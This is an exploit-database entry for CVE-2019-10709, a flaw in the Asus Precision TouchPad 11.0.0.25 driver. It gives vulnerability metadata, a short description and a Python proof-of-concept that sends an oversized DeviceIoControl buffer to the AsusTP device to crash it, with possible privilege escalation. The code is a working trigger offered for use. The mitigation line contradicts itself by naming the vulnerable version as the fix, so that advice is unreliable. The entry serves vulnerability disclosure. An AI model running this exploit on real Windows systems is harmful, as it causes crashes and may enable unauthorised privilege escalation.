Asus Precision TouchPad 11.0.0.25 - DoS/Privesc

vendor:

Precision TouchPad

by:

Athanasios Tserpelis

9.8

CVSS

CRITICAL

Denial of Service/Privilege Escalation

CWE

Product Name: Precision TouchPad

Affected Version From: 11.0.0.25

Affected Version To: 11.0.0.25

Patch Exists: YES

Related CWE: CVE-2019-10709

CPE: a:asus:precision_touchpad

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 RS5 x64

2019

Asus Precision TouchPad 11.0.0.25 – DoS/Privesc

A vulnerability in Asus Precision TouchPad 11.0.0.25 allows an attacker to cause a denial of service or privilege escalation by sending a specially crafted DeviceIoControl request. This vulnerability is due to insufficient input validation when handling DeviceIoControl requests. An attacker can exploit this vulnerability by sending a specially crafted DeviceIoControl request to the vulnerable driver. Successful exploitation of this vulnerability could result in denial of service or privilege escalation.

Mitigation:

Update to the latest version of Asus Precision TouchPad 11.0.0.25.

Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc
# Date: 29-08-2019
# Exploit Author: Athanasios Tserpelis of Telspace Systems
# Vendor Homepage: https://www.asus.com
# Version: 11.0.0.25
# Software Link : https://www.asus.com
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows 10 RS5 x64
# CVE: CVE-2019-10709

from ctypes import * 
kernel32 = windll.kernel32 
ntdll = windll.ntdll 
NULL = 0 
hevDevice = kernel32.CreateFileA("\\\\.\\AsusTP", 0xC0000000, 0, None, 0x3, 0, None) 
if not hevDevice or hevDevice == -1:
    print "*** Couldn't get Device Driver handle."
    sys.exit(0) 

buf = "A"*12048 
raw_input("Press Enter to Trigger Vuln") 
kernel32.DeviceIoControl(hevDevice, 0x221408, buf, 0x1, buf, 0x1 , 0, NULL)